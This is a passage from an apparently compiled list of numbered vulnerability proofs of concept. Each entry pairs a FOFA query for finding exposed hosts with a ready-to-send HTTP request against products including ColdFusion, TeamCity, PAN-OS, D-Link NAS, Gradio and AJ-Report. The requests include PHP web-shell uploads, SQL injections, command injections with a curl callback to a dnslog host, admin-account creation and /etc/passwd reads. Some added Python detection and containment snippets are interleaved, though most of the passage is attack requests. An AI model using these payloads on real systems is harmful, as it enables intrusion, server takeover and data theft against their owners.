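    parser.Parse(xml_text, True)
    return found


def parse_params_field(xml_text):
    """Gate for the Params form field: reject before the application parser
    (ElementTree here) ever sees a document that declares external entities."""
    refs = external_entities(xml_text)
    if refs:
        raise ValueError("external entities declared: %r" % (refs,))
    return ET.fromstring(xml_text)


# Constructed samples; attacker.example is a placeholder for the dnslog host.
XXE_SAMPLE = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<!DOCTYPE test [\n'
    '<!ENTITY t SYSTEM "http://attacker.example/x">\n'
    ']>\n'
    '<test>&t;</test>'
)
CLEAN_SAMPLE = '<?xml version="1.0"?><Params><SystemName>BIM</SystemName></Params>'

if __name__ == "__main__":
    print(external_entities(XXE_SAMPLE))  # [('t', 'http://attacker.example/x')]
    print(parse_params_field(CLEAN_SAMPLE).find("SystemName").text)  # BIM
```

The same check applies to any framework whose parser resolves external entities by default; the point is to inspect the DTD with a resolver that cannot fetch, then decide, rather than to rely on the production parser's settings.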
128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018 update 17 and earlier, 2021 update 7 and earlier, 2023 update 1 and earlier
FOFA:app="Adobe-ColdFusion"
PAYLOAD
129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd, sending the uuid from step 1 in the uuid header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

A successful request creates the named user with the SYSTEM_ADMIN role without any authentication.

CVE-2024-27199
The following paths reach the admin diagnostics page through path traversal, bypassing the authentication check on /admin/:
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 云商城 (H5 cloud mall) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

The injection point is the IPAddr value inside the JSON document carried as a string in messagecontent; the updatexml() error message leaks the database version.
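Because the injection sits two decoding layers down (form field, then a JSON document, then a second JSON document embedded in a string), a rule that only inspects the raw body or the top-level JSON fields misses it as soon as the client percent-encodes the payload. The following is an added example, not code from the page or from Netentsec: it peels the layers and reports the innermost field name, which is what triage needs. The sample body is built from the request above as a browser would actually send it; the SQLI pattern list is a short illustration drawn from this page's PoCs, not a complete ruleset.

```python
import json
import re
from urllib.parse import parse_qs, quote_plus

# Minimal illustrative patterns taken from the PoCs on this page; not a full ruleset.
SQLI = re.compile(
    r"(?i)(updatexml\s*\(|extractvalue\s*\(|\bsleep\s*\(|pg_sleep\s*\("
    r"|\bunion\s+(all\s+)?select\b|'\s*(and|or)\b)"
)


def leaf_strings(value, path):
    """Yield (path, text) for every leaf string under value. A string that is
    itself a JSON document is descended into instead of being reported,
    which is how the messagecontent element above carries its payload."""
    if isinstance(value, dict):
        for key, item in value.items():
            yield from leaf_strings(item, "%s.%s" % (path, key))
    elif isinstance(value, list):
        for index, item in enumerate(value):
            yield from leaf_strings(item, "%s[%d]" % (path, index))
    elif isinstance(value, str):
        if value[:1] in ("{", "["):
            try:
                inner = json.loads(value)
            except ValueError:
                inner = None
            if isinstance(inner, (dict, list)):
                yield from leaf_strings(inner, path)
                return
        yield path, value


def sqli_hits(form_body):
    """Decode an application/x-www-form-urlencoded body, walk every JSON layer
    inside each field, and return [(field_path, offending_text)]."""
    hits = []
    for field, values in parse_qs(form_body, keep_blank_values=True).items():
        for raw in values:
            for path, text in leaf_strings(raw, field):
                if SQLI.search(text):
                    hits.append((path, text))
    return hits


# Constructed sample: the request body above, JSON built programmatically and
# then percent-encoded the way a browser sends a form field.
INNER = {
    "BandIPMacId": "1",
    "IPAddr": "eth0'and(updatexml(1,concat(0x7e,(select version())),1))='",
    "MacAddr": "", "DestIP": "", "DestMask": "255.255.255.0",
    "Description": "Sample Description",
}
OUTER = {"protocolType": "addmacbind", "messagecontent": [json.dumps(INNER)]}
SAMPLE_BODY = "jsoncontent=" + quote_plus(json.dumps(OUTER))

if __name__ == "__main__":
    print(SQLI.search(SAMPLE_BODY))  # None: the percent-encoded body hides the payload
    for path, text in sqli_hits(SAMPLE_BODY):
        print(path, "->", text)
```

The same walker serves the other JSON-bodied injections on this page (item 154 carries its PG_SLEEP inside query.gsdwid); only the field names change.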
135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The md5(102103122) value shows up in the XPath error message when the injection succeeds.
136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
Items 137 to 140 are time-based blind injections: a response delayed by about 5 seconds confirms the SLEEP(5) executed.
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun (福建科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
Default credentials: admin/admin
143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute, base64-encoded (aWQ= is id). passwd is base64 as well (YWJjMTIzNDVjYmE decodes to abc12345cba) and is paired with the fixed user mydlinkBRionyg used by the PoC.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog address>`;
Accept-Encoding: gzip

The SESSID value is used as a file path, so the traversal drops a file under the device telemetry directory whose name contains the backtick command; ${IFS} stands in for a space. The command runs when telemetry is collected, so the callback to the dnslog host may arrive with a delay rather than in the response.
146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

Decoded, transport is || (echo '[S]'; id; echo '[E]')#; so the output of id appears between the [S] and [E] markers in the response.
147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

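Items 126 (aiohttp static route), 129 (ColdFusion file_name), 132's CVE-2024-27199 paths and 147 above are the same defect: a request path is joined onto a base directory without checking where it ends up. As an added example, not code from the page or from any of those projects, this is the containment check a static handler needs, plus the log-side test that flags such requests. Paths are modelled as POSIX and the web root is a placeholder.

```python
import posixpath
from urllib.parse import unquote


def decode_path(requested):
    """Percent-decode twice (catches %252e%252e) and treat backslashes as
    separators, since some servers accept both."""
    return unquote(unquote(requested)).replace("\\", "/")


def resolve_under_root(web_root, requested):
    """Join a request path onto web_root the way a safe static handler must:
    normalise every '.' and '..' lexically, then refuse any result that is
    not web_root itself or inside it. Returns the absolute path or None."""
    root = posixpath.normpath(web_root)
    candidate = posixpath.normpath(
        posixpath.join(root, decode_path(requested).lstrip("/"))
    )
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


def has_traversal(url_path):
    """Log-side indicator: any '..' segment after decoding, whatever prefix
    sits in front of it (/static/, /res/, /webeditor/, a file_name= value)."""
    return any(seg == ".." for seg in decode_path(url_path).split("/"))


if __name__ == "__main__":
    root = "/srv/app/static"  # placeholder web root
    print(resolve_under_root(root, "css/site.css"))               # /srv/app/static/css/site.css
    print(resolve_under_root(root, "../../../../../etc/passwd"))  # None
    print(has_traversal("/res/../admin/diagnostic.jsp"))          # True
```

Checking the normalised result against the root is the part the vulnerable handlers skip; rejecting literal ".." before normalisation is not enough on its own, because encoded or backslash variants reach the same place.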
148. CrushFTP authentication bypass and template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

The validationRules value is evaluated as JavaScript on the server with access to Java classes, which is what runs the command; the ;swagger-ui/ suffix is what lets the request through the authentication filter.
150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
Same endpoint and body as item 149, with a Linux command.
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
The request below only shows the unauthenticated reach to the endpoint (through the /;swagger-ui/ prefix); the injected parameter itself is not given here.
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

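Items 132 (the ;.jsp suffix), 149 and 150 (verification;swagger-ui/) and 151 (/;swagger-ui/...) share one root cause: an authentication filter matches on the raw request string while the routing layer strips ;-delimited path parameters before dispatch, so the two see different paths. The following is an added example, not code from the page, TeamCity or AJ-Report: a model of that mismatch and the check that closes it. The allow-list rule and the assumption that the container removes ;... segments (as Spring's UrlPathHelper does with removeSemicolonContent) are mine.

```python
import re
from urllib.parse import unquote

# Hypothetical filter rule modelled on this page's PoCs: anything that mentions
# swagger-ui or ends in .jsp is served without authentication.
PUBLIC_SUBSTRINGS = ("swagger-ui", ".jsp")
PUBLIC_PREFIXES = ("/swagger-ui/",)


def naive_is_public(raw_path):
    """The broken check: substring match on the raw, undecoded path."""
    return any(token in raw_path for token in PUBLIC_SUBSTRINGS)


def routed_path(raw_path):
    """The path the container actually dispatches on (assumption: behaves like
    Spring's UrlPathHelper with removeSemicolonContent): percent-decode, drop
    ';...' from every segment, collapse duplicate slashes."""
    path = unquote(raw_path)
    path = re.sub(r";[^/]*", "", path)
    return re.sub(r"/{2,}", "/", path)


def is_public(raw_path):
    """The fixed check: decide on the routed path, by exact prefix."""
    return routed_path(raw_path).startswith(PUBLIC_PREFIXES)


def bypass_candidates(raw_paths):
    """Log triage: requests the naive filter would pass but the fixed one
    would not, i.e. attempts to smuggle a protected route past the filter."""
    return [p for p in raw_paths if naive_is_public(p) and not is_public(p)]


if __name__ == "__main__":
    for p in ("/dataSetParam/verification;swagger-ui/",
              "/;swagger-ui/dataSource/pageList",
              "/app/rest/users;.jsp",
              "/swagger-ui/index.html"):
        print(p, "->", routed_path(p), "public:", is_public(p))
```

Running bypass_candidates over access-log paths is a cheap way to find both the AJ-Report and the TeamCity attempts in one pass; the TeamCity case also needs the jsp= query value checked the same way, since that is where its ;.jsp path travels.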
152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
Affected:
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter, i.e. a Basic-auth username of ';ls;' with the password doesnotmatter; the command is injected through the username.
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: copy /etc/passwd into a temporary file under the Gradio cache
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: fetch the cached copy (the directory name in the path is returned by step 2)
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier (天维尔) fire and rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

The PG_SLEEP call shows the backend is PostgreSQL; a response delayed by about 5 seconds confirms the injection.
155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

The response echoes the stored path; request it to run the file, e.g. http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104 / DVR-4216 operating system command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
Affected:
TBK DVR-4104
TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

Decoded, mdc is: echo; echo asrgkjh0 > /var/example.txt; ls -l /var; echo ----------------; cat /var/example.txt;
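Items 145 (cookie), 146 and 156 (query string) all place a shell command in a request field, and two of them disguise its shape with percent-encoding or ${IFS}. The following is an added example, not code from the page or from the vendors: a log-side check that decodes every query value and cookie, names the shell constructs it finds, and reports which field carried them. The indicator list is deliberately short; the request lines are reproduced from the page with dnslog.example as a placeholder callback host.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Shell constructs worth naming in an alert. Order only affects output order.
INDICATORS = [
    ("backtick", re.compile(r"`[^`]*`")),
    ("dollar-paren", re.compile(r"\$\(")),
    ("ifs", re.compile(r"\$\{IFS\}")),
    ("semicolon", re.compile(r";")),
    ("or-chain", re.compile(r"\|\|")),
    ("and-chain", re.compile(r"&&")),
    ("pipe", re.compile(r"(?<!\|)\|(?!\|)")),
]


def fields(request_line, headers):
    """Yield (location, decoded_value) for every query parameter and cookie.
    Cookies are split on '; ' rather than ';' so a ';' inside a value (the
    PAN-OS SESSID above ends with one) stays attached to its value."""
    _method, target, _version = request_line.split(" ", 2)
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        yield "query:" + name, value
    for part in headers.get("Cookie", "").split("; "):
        if "=" in part:
            name, _, value = part.partition("=")
            yield "cookie:" + name, unquote(value)


def command_injection_indicators(request_line, headers):
    """Return {location: [indicator names]} for fields containing any shell
    construct; an empty dict means nothing was found."""
    found = {}
    for location, value in fields(request_line, headers):
        names = [name for name, pattern in INDICATORS if pattern.search(value)]
        if names:
            found[location] = names
    return found


# Constructed from the requests on this page; dnslog.example is a placeholder.
PANOS = ("GET /global-protect/login.esp HTTP/1.1",
         {"Cookie": "SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog.example`;"})
MAJORDOMO = ("GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1", {})
TBK = ("POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B HTTP/1.1",
       {"Cookie": "uid=1"})

if __name__ == "__main__":
    for req in (PANOS, MAJORDOMO, TBK):
        print(command_injection_indicators(*req))
```

A bare semicolon is noisy on its own in general traffic; the value of naming each construct is that backtick or ${IFS} next to a cookie, or a ; inside a parameter that should be a filename, is a much stronger signal than any single regex hit.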
157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
